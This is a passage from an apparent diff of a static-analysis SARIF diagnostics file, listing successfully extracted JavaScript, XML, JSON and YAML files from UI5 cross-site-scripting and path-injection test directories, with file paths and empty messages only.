- "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 234 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 235 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 236 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 237 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/.eslintrc.json", - "uriBaseId" : "%SRCROOT%", - "index" : 238 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 239 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 240 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/Component.js", - "uriBaseId" : "%SRCROOT%", - "index" : 241 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 242 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", - "uriBaseId" : "%SRCROOT%", - "index" : 243 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 244 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 245 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/model/todoitems.json", - "uriBaseId" : "%SRCROOT%", - "index" : 246 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/AllJourneys.js", - "uriBaseId" : "%SRCROOT%", - "index" : 247 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/FilterJourney.js", - "uriBaseId" : "%SRCROOT%", - "index" : 248 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/SearchJourney.js", - "uriBaseId" : "%SRCROOT%", - "index" : 249 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/TodoListJourney.js", - "uriBaseId" : "%SRCROOT%", - "index" : 250 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/arrangements/Startup.js", - "uriBaseId" : "%SRCROOT%", - "index" : 251 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.html", - "uriBaseId" : "%SRCROOT%", - "index" : 252 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.js", - "uriBaseId" : "%SRCROOT%", - "index" : 253 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/pages/App.js", - "uriBaseId" : "%SRCROOT%", - "index" : 254 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.html", - "uriBaseId" : "%SRCROOT%", - "index" : 255 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.js", - "uriBaseId" : "%SRCROOT%", - "index" : 256 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/AllTests.js", - "uriBaseId" : "%SRCROOT%", - "index" : 257 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/controller/App.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 258 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.html", - "uriBaseId" : "%SRCROOT%", - "index" : 259 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.js", - "uriBaseId" : "%SRCROOT%", - "index" : 260 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/util/Helper.js", - "uriBaseId" : "%SRCROOT%", - "index" : 261 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/view/App.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 262 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 263 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 264 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 265 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 266 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 267 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 268 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 269 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 270 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 271 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 272 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 273 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 274 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 275 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 276 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 277 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 278 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 279 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 280 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 281 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 282 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 283 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 284 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 285 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 286 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 287 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 288 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 289 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 290 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 291 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 292 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 293 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 294 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - 